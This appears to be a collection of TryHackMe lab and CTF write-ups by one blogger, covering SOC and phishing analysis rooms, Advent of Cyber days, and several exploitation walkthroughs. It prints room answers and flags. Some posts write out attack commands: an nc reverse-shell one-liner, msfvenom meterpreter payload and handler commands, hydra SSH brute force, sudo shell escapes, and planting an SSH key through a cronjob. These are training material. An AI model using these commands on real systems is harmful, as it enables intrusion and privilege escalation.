TryHackMe - Shadow Trace Writeup

 Shadow Trace is premium room on TryHackMe.com part of the SOC Level 1 Path.

We need to analyse a suspicious file, uncover hidden clues, and trace the source of the infection.

Task 2 - File analysis

Q1 What is the architecture of the binary file windows-update.exe?

I opened file with  PE studio program and under indicators / file -type

64-bit

Q2 What is the hash (sha-256) of the file windows-update.exe?

Under footprints - file > sha256

b2a88de3e3bcfae4a4b38fa36e884c586b5cb2c2c283e71fba59efdb9ea64bfc

Q3 Identify the URL within the file to use it as an IOC

from pestudio under indicators / string - url-pattern

hxxp[://]tryhatme[.]com/update/security-update[.]exe

Q4 With the URL identified, can you spot a domain that can be used as an IOC?

 strings .\Desktop\windows-update.exe | findstr "tryhatme"

responses[.]tryhatme[.]com

Q5 Input the decoded flag from the suspicious domain

 strings .\Desktop\windows-update.exe | findstr "tryhatme"

flag is hiding at the end of first "link" and needs to be decoded by cyberchef I went with base64 decoding and voila flag was there

THM{you_g0t_some_IOCs_friend}

Q6 What library related to socket communication is loaded by the binary?

in pe studio when through libraries and knowled from previous rooms I found the one responsible

WS2_32.dll

Task 3 - Alerts Analysis

Q1 Can you identify the malicious URL from the trigger by the process powershell.exe?

URL in the trigger is encoded by base64 I used decoder in cyberchef

https[:]//tryhatme[.]com/dev/main[.]exe

Q2 Can you identify the malicious URL from the alert triggered by chrome.exe?

Url in trigger is encoded by decimal with colon separators, I used decoder in cyberchef

hxxps[://]reallysecureupdate[.]tryhatme[.]com/update[.]exe

Q3 What's the name of the file saved in the alert triggered by chrome.exe?

Name of the file is written in trigger, you need to carefully read the alert and you see the name of file

test.txt

TryHackMe - Phishing Prevention room

 TryHackMe - Phishing Prevention room

Phishing Prevention is the fourth room in TryHackMe’s Phishing Analysis module under the SOC Level 1 path. If you're working through the room and get stuck, this guide provides clear hints and answers to help you progress without frustration.

Task 2

Q1 Based on TryHackMe's SPF record above, how many domains are authorized to send email on its behalf?

3

Q2 What is the intended action of an email that returns a SoftFail verification result?

Flag

Task 3

Q1 Based on the sample header above, what is the reason for the permerror?

no key for signature

Task 4

Q1 Which DMARC policy provides the greatest amount of protection by blocking emails that fail the DMARC check?

p=reject

Task 5

Q1  Which S/MIME component ensures that only the intended recipient can read the contents of an email message?

Can be found in description of the task - encryption

Task 6

Q1 Which Wireshark filter can you use to narrow down your results based on SMTP response codes?

smtp.response.code

Q2 How many packets in the capture contain the SMTP response code 220 Service ready?

19

Q3 One SMTP response indicates that an email was blocked by spamhaus.org. What response code did the server return?

553

Q4 Based on the packet from the previous question, what is the full Response code: message?

Requested action not taken: mailbox name not allowed (553)

Q5 Search for response code 552. How many messages were blocked for presenting potential security issues?

6

Task 7 

Q1 How many SMTP packets are available for analysis? 

FIlter pcap file for smtp traffic and count of them is your answer

Q2  What is the name of the attachment in packet 270?

I was sorting the packets by id/number and search for 270 and checked for Line-based text data and seen it there. 

Or use option ctrl g and enter the number and go to that packet.

Q3 According to the message in packet 270, which Host IP address is not responding, making the message undeliverable?

You can read through the email content and find the correct IP

Q4 By filtering for imf, which email client was used to send the message containing the attachment attachment.scr?

filter by imf and then look through emails for which email contains the attachment.

Q5  Which type of encoding is used for this potentially malicious attachment?

Answer can be found information under Content-Transfer-Encoding 

Task 8 

Q1 A security team wants to implement a control to detect hidden malware inside email attachments.
They need a way to analyze suspicious files without risking infection on real systems.
Which protective technique would allow them to observe a file's behavior safely?

Answer can be found in explanation part of this task - Sandboxing

TryHackMe - Smag Grotto - writeup

Smag Grotto is one of the easy CTF rooms on the TryHackMe.com. Here are my steps that lead me to the successful solution and finding both user and root flag. Before you start you need to boot up the VM and attackbox machine.

1. step
First I have run nmap scan:

nmap -sC VM_IP

Scan gives me that only 2 ports are open - ssh and http. Connection to the page ip, didnt give me much more info.
2. step
I then tried researching the VM with gobuster:

gobuster dir -t 40 -u VM_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

With gobuster I find /mail folder.
3. step
Then I opened /mail folder where we find the email correspondence with .pcap trace file.
4. step
I have downloaded the pcap file and open it with wireshark.In the trace file I have found the new domain where site is located. I also found the username and password for login.
5. step
To access new domain I have added VM_IP and new domain I have found in .pcap file to the /etc/hosts file on attackbox machine.
6. step
Now I have entered domain to the web browser and found login.php script and enter credentials from .pcap file.
7. step
After the login you are at site where you can enter commands. I had to look around the internet to get hint what to do in this step. In this step we initiate the reverse shell and start nc listener on attack box. I have run:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc Attackbox_IP 1338 >/tmp/f

On the attackbox I have started nc listener:

nc -lvnp 1338

8. step
In a second I got shell access as www-data. After that I have checked cronjob settings and see that there is copy of the /opt/.backups/jake_ir_rsa.pub.backup public key to the authorised keys. Hmmm I think we could exploit this one by putting our public key instead of legit key.
9. step
On attackbox machine we can create our public key with following command:

ssh-keygen -t rsa -P '' -f jakekey

then we open key file and copy to the target machine with :

echo "public_key_we_created" > jake_id_rsa.pub.backup

Note that you need to create file in /opt/.backups/ folder and filename needs to be as stated above that cronjob will take our file and we can login to the machine.
10. step
Ok in this step I tried to log in to the machine using key. But of course I bit forgot how to do it so I had to look for little help what is exact command to use ssh keys to connect to the machine.

ssh -i jakekey jake@devleopment.smag.thm

then I pressed enter and I was logged in as jake. We can now search for the user flag.

find / -type f -name user.txt 2>/dev/null

11. step
Then I can open user.txt file and copy the flag.
12. step
Now I was missing only root flag and I could access file only as root. I checked what programs I could run as jake user:

sudo -l

Output of the command showed us that apt-get command can be run as jake user.
13. step
To do so we head over to the GTFObins and we find the command that we can run as current user to get root access.


14. step
We can find root flag at:

cat /root/root.txt

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 17 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Day 17 covers topic of the Regular Expressions.

1. Question 1, Question 2
To answer first two questions you can use following regular expression:

^[a-zA-Z0-9]{6,12}$

2. Question 3, Question 4
Following regular expression will help you get answers:

^.+@.+\.com$

3. Question 5
Following regular expression will help you get answers:

lewisham44

4. Question 6
Following regular expression will help you get answers:

maxximax

5. Question 7
Following regular expression will help you get answers:

^.+@.+\.com$

6. Question 8, Question 9

^http(s)?.{3}(www)?.+..+$

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe - ItsyBitsy - writeup

ItsyBitsy room is second room in Security Information and Event Management module of the SOC Level 1 path on TryHackMe. Put your ELK knowledge together and investigate an incident. First you will need to boot up VM and Attackbox which will take few minutes. After attackbox is is booted up we can open Firefox browser and access the Kibana.

1. Question 1 - How many events were returned for the month of March 2022?
Change the date range to look at March 2022 log and you can answer first question.
2. Question 2 -What is the IP associated with the suspected user in the logs?
Question is asking about the source_ip filed. From the logs we can see 2 IP addresses so you much work to find right one.
3. Question 3 - The user’s machine used a legit windows binary to download a file from the C2 server. What is the name of the binary?
Answering this question took me longest time because I didnt find the right answer because I was either looking at wrong place or looked at right answer but not realising this was the answer. Hint look at the user_agent field ;)
4. Question 4 - The infected machine connected with a famous filesharing site in this period, which also acts as a C2 server used by the malware authors to communicate. What is the name of the filesharing site?
When we filter by IP from Question 2 we can answer this one quckly because there are only 2 logs from that source_ip.
5. Question 5 - What is the full URL of the C2 to which the infected host is connected?
Hostname + url field
6. Question 6 - A file was accessed on the filesharing site. What is the name of the file accessed?
We can connect to the filesharing site from URL from previous question and find a file there.
7. Question 7 - The file contains a secret code with the format THM{_____}.
Open file in the filesharing site and copy the flag code.

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 16 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Today's task covers topic of SQL Injection (SQLi). SQL injection is the placement of malicious code in SQL statements, via web page input. Attackers will most probably try to querry the database return all of the users and passwords of the application if this vulnerability exist. Before you start with solving task you need to boot up VM in the task and attackbox for accessing the page. It will probably take a minute or two to boot up. After that we can open link to the developer page of the app we will try to fix. We login with provided credentials.

1. Question 1 - Fixing SQLi by Data Type Validation
First we use fix from description of the task to fix first and then second querry in the elf.php file after we have saved and press run we will get the first flag
2. Question 2 - Fixing SQLi Using Prepared Statements
With prepared statment described in the task we can quickly fix the search_toys.php and get second flag.
3. Question 3
To find the third flag we need to fix toy.php we can easly fix it same way we fix the elf.php with data type validation.
4. Question 4
For fixing the 4th vunlerability and getting forth flag we will need to fix the login.php. We do it with prepared statment as we did with second flag. Just make sure you use $username and $password instead of $q

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 15 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Here are my solutions for the Day 15, if anyone gets stuck or need bit of help solving questions. Today's task is addressing issues of input validation of file upload funtionality and unrestricted file upload vulnerabilities. If any of these things are implemented during development of the site threat actor can exploit it and get access to the server. First you need to boot up VM and Attackbox since they will take some time to boot up. All questions exepct Q3 can be answered by carefully reading task description of vulnerabilities and how to avoid them. For Q3 we need to create the paypload, we got the command in task description:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=AttackBox_IP LPORT="Listening port" -f exe -o cv-username.exe

It will take a minute to generate it. It will be saved on attackbox /root folder. then you run second command to create the listener :

sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST AttackBox_IP; set LPORT 'listening port'; exploit"

After that we can head to the firefox browser and upload the payload file we created with first step. Now we can open listener window and wait until the file that we uploaded to website will be run. When connection is active we can move through directories

1. pwd to check where we are
2. cd ../..
3. we head to the folder HR Elf's Documents directory
4. cat flag.txt

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 14 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Here are my solutions for the Day 14, if anyone gets stuck or need bit of help solving questions. First you need to boot up VM and attackbox since they will take some time to boot up. After both VM and attackbox machine are booted up you can open the website on provided ip and port 8080 and log in with credentials provided in description of the task. Because of vulnerability present in the website applicaton we can freely change ids in the web address and we cycle (changing profile id numbers) through registered users and find answer to the first question.
For second one we copy profile picture and we change id number for images, because profile images have same vulnerability and we can cycle through pictures and we can find the picuter containing flag which is answer of the second question. I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 13 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Here are my solutions for the Day 13, if anyone gets stuck or need bit of help solving questions. In today's task main program will be Wireshark. Wireshark is free and opensource package analyzer which will help us solve today's task. Before you start answering questions you need to start the VM, which it takes few minutes. After the VM is booted up you can open trace file which is placed on desktop.

1. Q1

When you opened the file you can open drop down meanu options Statistics / Protocol Hierarchy. With data from popup window we can answer first question.
2. Q2

We can now close Procotol Analysis window and open Statistics / Conversation under TCP tab where you will find all data to answer second question.
3. Q3

For answering this question you will need to google what service uses this port.
4. Q4

In search/filter bar you write DNS to filter only dns packages and in the packets under Query / Name we can see domain names that were searched. Dont forget to defang answers. Defanging is process to format url in such way that it can't be clcked by accident. You should forget to put in alphabetical order.
5. Q5 & Q6 & Q7 & Q8

We filter by http requests and then we can find answers from 5 to 8.
6. Q9

For exporting files from trace we head to File/ Export Objects/ HTPP... and we download the file. For obtaining the hash value of the file can run

sha256sum filename

and copy part of the output.
7. Q10

Open Virus total and copy hash value of mailcious file and in thab behavour you will find answer to this last question. Dont forget to defang answers.

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 6 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Here are my solutions for the Day 6, if anyone gets stuck. Open the email in text editor and can solve most of the questions with analysis

1. Q1

Answer hides in 4th line of the email file - From:
2. Q2

Answer hides in 14th line of the email file - Return-Path:
3. Q3

Answer hides in 4th line of the email file.
4. Q4

Answer hides in 11th line of the email file - X-spam score
5. Q5

Copy value from message ID to the CyberChef and decode from base64. Output is the answer to this question.
6. Q6

GO to EmailRep and enter the sender email. Answer will appear right below the entry box where you have entered email.
7. Q7

Open terminal and move to the eml_attachments fodler on desktop and run:

sha256sum file_name

to get hash value which is the answer of Q7.
8. Q8

Visit VirusTotal site and enter attachment's hash
9. Q9

Visit InQuest site, enter attachment's hash and look for answer on the site

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 3 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Here are my solutions for the Day 3, if anyone gets stuck. Today's assinment is covering the OSINT technics.
OSINT is gathering and analysing publicly accessable data for intel purposes. For example:

• the internet
• mass media
• journals and research pappers
• photos
• location informations

1. Q1

To anwser the first question you will need to visit who.is to get info about domain in question.
2. Q2

I was looking up on github to find source repository. What is the name of file where would you usally save settings ?
3. Q3

I was looking up on github to find source repository. What is the name of file where would you usally save settings ?
4. Q4

For succesfully answering this one you have to search through the file we talk in Q2 and Q3.
5. Q5

For succesfully answering this one you have to search through the file we talk in Q2 and Q3

I hope anyone who gets stuck finds it helpful AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 2 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Here are my solutions for the Day 2, if anyone gets stuck.

1. Q2

To answer this use

ls

command on home folder
2. Q3

With previous command you answer the Q3.
3. Q5

Display server log file in console where you see dates and check the week day and you can answer the question.
4. Q6

With displaying the server log file we can see that logs contains only one IP address.
5. Q7



grep -v 404 webserver.log

To display all lines that does not include 404 requests and see only succesful ones and you can then easly see
6. Q8



grep -i THM *.log


grep through all log files in folder to find the flag.

I hope anyone finds it usefull AudiTTRSi

TryHackMe - Bolt

Bolt is one fo easiest room for beginers on TryHackMe.com After running basic nmap scan:

nmap -sC -sV Target_IP

We can see open ports, most intresting is port 8000 with running BOLT CMS.
After looking around the web page, we find login username and password in post on the page. We can search for vunlrabilities via web search and we can find following for Authenticated Remote Code Execution. How will you tackle this one? I used metasploit and use following module exploit/unix/webapp/bolt_authenticated_r. Throught the metasploit console set up needed variables LHOST, RHOST, USERNAME, PASSWORD and run the exploit. We need to run:

find / -type f -name flag.txt 2>/dev/null

and we get the flag in a seconds. I hope this short and easy tutorial helped anyone getting stucked in solving this room. audittrsi

TryHackMe - Pickle Rick - walkthrough

Pickle Rick - A Rick and Morty CTF. Help turn Rick back into a human!
It is a CTF room on TryHackMe page if you are fan of Rick and Morty cartoon you should defently try to solve it. It is not that hard and you can solve it pretty fast.

1. step:
Start target machine that you will try to exploit and start Attackbox machine.
2. step:
As usually we try with nmap scan to check what ports are open on target machine with command:


nmap -sC -sV Target_IP


With only 2 ports open we check the web page
3. step:
There is nothing much on the page but is it? We check the page source code where we find username which might be useful in next steps
4. step:
With use of the gobuster we scan webpage to find hidden files or directories I have used following command:


gobuster dir -t 40 -u 10.10.151.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x html,php,txt -t 60



5. step:
We find the login.php access page but we are missing password. We check the robot.txt file and we get possible password candidate for login. Which turns out that it is actual username and pass.

6. step:
We end up on command panel where we can write some command like ls and we can see interesting files there with Q1 answer ingridient. We try opening filed with cat command File_name.txt but it doesnt allow us.
We try with less command File_name.txt voila we opened it and we can answer first Q1.
7. step:
In this step we check the clue.txt file which says that we should look around directories for second ingridient. We try to get to other directories in /home/rick/ we find the file second ingridients. Since the spaces in files names and linux arent good friends we need to use less command like this:


less '/home/rick/second ingredients'


And voila we have 2nd ingredient and we can answer the Q2.
8. step:
with command

sudo -l

we check what we can run as root.
9. step:
we can try

sudo ls -la /root

and we find 3rd.txt
10. step:
Since we cannot open file in it's folder we can try copying to other directory and change permissions:


sudo cp /root/3rd.txt /var/www/html/ && chmod 777 3rd.txt

11. step:
In browser open file via Target_IP/3rd.txt. and we can answer last Q3 in this room.

I hope anyone who gets stucked finds this writeup helpful.

TryHackMe - Linux PrivEsc - Task 6 - Privilege Escalation : Sudo

This is probably one of the easiest type of PrivEsc tasks.
With command :

sudo -l

We check what services we can run as root. adn with this info we can answer Q1
From output of the command we see 3 services/programs that we can run as root. Now that we have this information we can head over to the GTFObins To check for each service/program that we can gain root access to system.

• Find

sudo find . -exec /bin/sh \; -quit

• Less

sudo less /etc/profile
!/bin/sh

• nano

sudo nano
^R^X
reset; sh 1>&0 2>&0

Note about getting root via nano one command at the time ^R - is CTRL + R and ^X CTRL + X
To answer Q2 we run:

find / -type f -name flag2.txt 2>/dev/null

that we find path to the flag2.txt file
To answer Q3 we neet to check GTFObins to get command.
To answer Q4 we open /etc/shadow to find answer. I hope this post is helpfull for anyone stuck at solving this task.

TryHackMe - Bounty Hacker -walkthrough

Bounty Hacker is one of easy rooms on TryHackMe.com
I was able to finish it up in couple of minutes with some reference from other similar rooms like this one.

1. First step

In this step you deploy the target VM and start Attackbox if you dont have it up already. It takes a minute or two to start up.


2. Second step

We use nmap to scan target VM.

nmap -A -T4 _IP_target_VM


Command takes some time to scan and display us back what ports are open. You can see 3 ports open 21 with FTP, 22 ssh and 80 apache server.


3. Third step

As FTP is open and it allows you to connect with anonymous user we try to connect to FTP server on target machine with command:

FTP IP_target_VM


When prompted for username you enter anonymous. We check what files we can find on server there are 2 files. One cointains note from one user this is also answer to the Q3 and other is list of what it looks like passwords. You can download files by command:


get file_name



4. Forth step

We will use hydra brute forcing tool to check if any passwords from list we could obtain from FTP server. I used following command:

hydra target_VM_IP ssh -l lin -P path_to_the_password_list -s 22 -vV


SSH user i used the one i found in file on FTP server.


5. Fifth step

After Hydra finish its work and you get correct pass you can ssh to the target VM.


6. Sixth step

When we are logged in server I tried to find user flag and write location of the file into user-flag file:

find / -type f -name user.txt 2>/dev/nul > user-flag 



7. Seventh step

In this step we check what command can current user run as sudo. We use:

sudo -l


As we see now only one command we can run. We had over to the GTFObins and check what command to run. Copy paste command to the command line and voila we have root access.
8. Eighth step

Last step is to find the root.txt file we write its location to root-flag file:

find / -type f -name root.txt 2>/dev/null > /tmp/root-flag 

I hope this helps to the people who might get stucked during solving this room.

TryHackMe - Exploit Vulnerabilities module - Task 5 - Practical: Manual Exploitation

This is my first writeup/walkthrough post for the TryHackMe website.
TryHackMe is online platform for learning cyber security, using hands-on exercises and labs.
This post refers to the Task 5 - Practical: Manual Explotaition which is part of the module of Exploit Vulnerabilities on THM JR penetration tester course.
Task 5 is final task in this submodule and is to show practical example of things you learned through the previous tasks.

First step is to start VM that you will try to exploit as description says it requires few minutes to boot up. If you will use Attackbox on their site don't forget to start it also.

Second step To answer the Q1 you need to just open website that is hosted on VM you started in first step. Scroll down to the bottom of the page and voila you will find name version of the website.

Third step Now that you know website version you will need to find the way to exploit and gain access to it. You could also online tools but this Task 5 one aims towards use of the searchsploit tool that is installed and ready to use in Attackbox machine. we use following command:

searchsploit online book store

We get 4 different results, but we choose last from the list wich offers remote code execution.


Forth step - To start exploit you will use following command:

python name_of_script.py VM_IP

Since I was not in the same directory as exploit script I got error that exploit script was not found, so I used:

locate 47887.py

With that I found correct location of the exploit script and then i could ran exploit script correctly without errors:

python path_to_the_exploit_/47887.py VM_ip_Address

You are then only prompted to continue with exploit and in matter of seconds you get access to the shell of the VM.

Fifth step - finding flag.txt file and answer to the Q3 of this task.
This did not require much of the search since file is located in current folder and I used

cat flag.txt

To display flag.txt file content. I hope that this post is helpful for anyone trying to solve this challenge. audittrsi